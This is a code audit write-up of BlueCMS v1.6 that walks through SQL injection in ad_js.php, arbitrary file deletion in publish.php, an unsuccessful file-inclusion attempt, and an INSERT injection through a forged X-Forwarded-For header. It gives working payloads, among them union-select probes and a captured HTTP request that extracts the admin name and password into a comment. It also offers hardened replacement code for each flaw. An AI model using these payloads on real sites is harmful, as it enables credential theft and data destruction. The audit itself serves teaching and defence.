BlueCMS v1.6 code audit
2022-06-28 19:59:00 【qq_ forty-two million three hundred and seven thousand five hun】
This is a starter code audit of a simple CMS. Seay (an automated PHP source-audit tool) was used for the first pass, and the findings below were then checked one by one.
SQL injection in uploads/ad_js.php
The ad_id variable is taken from GET with no filtering, concatenated into the SQL statement and executed:
```php
define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';
// trim() is the only processing applied to the user-supplied value
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
    echo 'Error!';
    exit();
}
// $ad_id is concatenated straight into the WHERE clause
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
```
Following the call into the database class, the query string is executed as it is, with no further processing (the listing shows getall, which takes the same path):
```php
function getall($sql, $type=MYSQL_ASSOC){
    // the caller's SQL string is handed to the driver unchanged
    $query = $this->query($sql);
    while($row = mysql_fetch_array($query,$type)){
        $rows[] = $row;
    }
    // note: $rows is never initialised, so an empty result set returns null
    return $rows;
}
```
To verify, request uploads/ad_js.php?ad_id=1' directly. The single quote causes a database error, which shows the input reaches the query. Next, guess the number of columns:
uploads/ad_js.php?ad_id=1%20order%20by%207%20--+
order by 7 returns normally and order by 8 errors, so the query has 7 columns.
union select 1,2,3,4,5,6,7 --+
Column 7 is echoed. The rendered page shows nothing; you have to view the page source to see the output.
union select 1,2,3,4,5,6,user() --+
This returns the current database user.
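A hardened replacement for the ad_js.php lookup, added here as an example (it is not BlueCMS code). It assumes $pdo is a PDO handle to the BlueCMS database and that table() is the original helper returning the prefixed table name.

```php
<?php
// Added example, not BlueCMS code: the ad_js.php lookup with input validation
// and a bound parameter. Assumes $pdo (PDO handle) and the original table().

function fetch_ad(PDO $pdo, $raw_ad_id)
{
    // ad_id is a numeric key: accept only a positive integer, never a trimmed
    // string that is glued into the query text.
    $ad_id = filter_var($raw_ad_id, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    if ($ad_id === false) {
        return null;
    }
    // The value travels as a bound parameter, so "1 order by 7" or
    // "1 union select ..." is rejected above and could never reach the SQL.
    $stmt = $pdo->prepare('SELECT * FROM ' . table('ad') . ' WHERE ad_id = :ad_id');
    $stmt->bindValue(':ad_id', $ad_id, PDO::PARAM_INT);
    $stmt->execute();
    $ad = $stmt->fetch(PDO::FETCH_ASSOC);
    return $ad === false ? null : $ad;
}

// Drop-in use at the top of ad_js.php, keeping the original error behaviour.
$ad = fetch_ad($pdo, isset($_GET['ad_id']) ? $_GET['ad_id'] : '');
if ($ad === null) {
    echo 'Error!';
    exit();
}
```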
Arbitrary file deletion in uploads/publish.php
```php
elseif($act == 'del_pic')
{
    // the file name comes from $_REQUEST (GET, POST or cookie)
    $id = $_REQUEST['id'];
    $db->query("DELETE FROM ".table('post_pic').
        " WHERE pic_path='$id'");
    // no check that the path stays inside the picture directory
    if(file_exists(BLUE_ROOT.$id))
    {
        @unlink(BLUE_ROOT.$id);
    }
}
```
The id parameter is read from $_REQUEST as a file name; if the file exists it is deleted, with no check on where the path points. To verify, create 1.php directly under the uploads directory and request uploads/publish.php?act=del_pic&id=1.php.
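A hardened version of the del_pic branch, added as an example (not BlueCMS code). It assumes $pdo is a PDO handle, BLUE_ROOT and table() are the original helpers, and PIC_DIR (an assumed constant) names the directory that holds post pictures; it only deletes files the post_pic table actually records, and only inside that directory.

```php
<?php
// Added example, not BlueCMS code: delete a post picture only if the database
// knows it and it resolves inside the picture directory. Assumes $pdo, BLUE_ROOT,
// table() and PIC_DIR (assumed constant, e.g. 'data/upload/').

function delete_post_pic(PDO $pdo, $raw_path)
{
    $pic_root = realpath(BLUE_ROOT . PIC_DIR);
    if ($pic_root === false) {
        return false;
    }
    // Look the value up with a bound parameter instead of interpolating it;
    // a path that is not a recorded picture is simply not deletable.
    $stmt = $pdo->prepare('SELECT pic_path FROM ' . table('post_pic') . ' WHERE pic_path = :p');
    $stmt->bindValue(':p', $raw_path, PDO::PARAM_STR);
    $stmt->execute();
    $pic_path = $stmt->fetchColumn();
    if ($pic_path === false) {
        return false;
    }
    // realpath() collapses "../" and symlinks, so a prefix check on the
    // resolved path is meaningful; anything outside PIC_DIR is refused.
    $target = realpath(BLUE_ROOT . $pic_path);
    if ($target === false || strpos($target, $pic_root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    if (!is_file($target) || !unlink($target)) {
        return false;
    }
    $del = $pdo->prepare('DELETE FROM ' . table('post_pic') . ' WHERE pic_path = :p');
    $del->bindValue(':p', $pic_path, PDO::PARAM_STR);
    $del->execute();
    return true;
}
```

An ownership check (the caller must own the post the picture belongs to) still belongs in front of this call; the function only closes the path-traversal side.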
Arbitrary file inclusion
```php
elseif ($act == 'pay'){
    include 'data/pay.cache.php';
    $price = $_POST['price'];
    $id = $_POST['id'];
    $name = $_POST['name'];
    if (empty($_POST['pay'])) {
        // "Sorry, you have not selected a payment method" (string restored from mojibake)
        showmsg('对不起，您没有选择支付方式');
    }
    // the POST value sits between a fixed directory and a fixed file name
    include 'include/payment/'.$_POST['pay']."/index.php";
}
```
The pay value from POST goes into the include, but it sits between a fixed directory and a fixed file name, so the trailing /index.php would have to be truncated to include anything else.
%00 truncation: failed.
Truncation by path length:
① Conditions: on Windows the path must be longer than 256 bytes; on Linux, longer than 4096 bytes.
Windows keeps at most 256 bytes of the path and discards the excess.
Linux keeps at most 4096 bytes of the path and discards the excess.
The padding is done with dots (.).
I don't know why they didn't succeed
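A whitelist for the payment-module include, added as an example (not BlueCMS code). It assumes the modules live under include/payment/<name>/index.php as on the page and that data/pay.cache.php provides an array $pay_list (assumed name) keyed by module name; any value that is not an enabled module name is refused before include() sees it.

```php
<?php
// Added example, not BlueCMS code: resolve the payment module from a whitelist.
// Assumes include/payment/<name>/index.php layout and $pay_list (assumed name)
// from data/pay.cache.php.

function payment_module_path($raw_pay, array $enabled_modules)
{
    // A module name is a short identifier: no slashes, dots, NUL bytes or
    // padding, so neither %00 nor path-length tricks can reach include().
    if (!is_string($raw_pay) || !preg_match('/^[a-z0-9_]{1,32}$/', $raw_pay)) {
        return null;
    }
    // Only modules the site has actually enabled may be loaded.
    if (!in_array($raw_pay, $enabled_modules, true)) {
        return null;
    }
    // Resolve the final path and confirm it is still inside the module directory.
    $base = realpath(dirname(__FILE__) . '/include/payment');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . '/' . $raw_pay . '/index.php');
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Replacement for the raw include in the 'pay' branch.
include 'data/pay.cache.php';
$module = payment_module_path(isset($_POST['pay']) ? $_POST['pay'] : '', array_keys($pay_list));
if ($module === null) {
    showmsg('Invalid payment method');
    exit();
}
include $module;
```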
INSERT injection in the comment area: the client IP is taken from the request headers and inserted into the database without filtering, so a forged IP header can append extra rows to the INSERT, including one whose content is the administrator's password.
include/comment.php
```php
if($act == 'send')
{
    if(empty($id))
    {
        return false;
    }
    $user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
    $mood = intval($_POST['mood']);
    // the comment body is escaped for HTML only; nothing is escaped for SQL
    $content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
    $content = nl2br($content);
    $type = intval($_POST['type']);
    if(empty($content))
    {
        // message text is mojibake on the source page: "content must not be empty"
        showmsg('�������ݲ���Ϊ��');
    }
    if($_CFG['comment_is_check'] == 0)
    {
        $is_check = 1;
    }
    else
    {
        $is_check = 0;
    }
    // getip() returns the client address read from the request headers and its
    // value is concatenated straight into the VALUES list
    $sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";
    $db->query($sql);
    if($type == 1)
    {
        $db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
    }
    elseif($type == 0)
    {
        $db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
    }
```
Visit /uploads/comment.php?id=1, write a comment, capture the request with Burp Suite and add an X-Forwarded-For header:
```http
POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1

mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB
```
The data is output successfully in the comment.
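A getip() replacement that only ever returns a syntactically valid IP address, added as an example (not BlueCMS code). It assumes the original getip() trusts X-Forwarded-For as the page describes; $trusted_proxies (an assumed parameter) lists the reverse proxies the site itself runs, and the constructed $forged array stands in for $_SERVER.

```php
<?php
// Added example, not BlueCMS code: a client-IP lookup that cannot return
// attacker-controlled text. $server plays the role of $_SERVER; $trusted_proxies
// (assumed) holds the site's own proxy addresses.

function get_client_ip(array $server, array $trusted_proxies = array())
{
    // REMOTE_ADDR comes from the TCP connection, not from a header, so it is
    // the one value a client cannot set directly.
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    // Consult X-Forwarded-For only when our own proxy added it.
    if (!in_array($remote, $trusted_proxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // The proxy appends the connecting client as the last entry of the chain.
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    $candidate = end($chain);
    // Anything that is not a bare IP (quotes, parentheses, SQL) is dropped.
    if (filter_var($candidate, FILTER_VALIDATE_IP) === false) {
        return $remote;
    }
    return $candidate;
}

// Constructed request resembling the capture above: the header carries SQL
// instead of an address, so the function falls back to REMOTE_ADDR.
$forged = array(
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => "127.0.0.1','1'),('5', '1', 'x')##",
);
$ip = get_client_ip($forged, array('10.0.0.5'));
```

Validating the address closes this specific path; the INSERT in comment.php should additionally bind every value as a parameter rather than interpolating it.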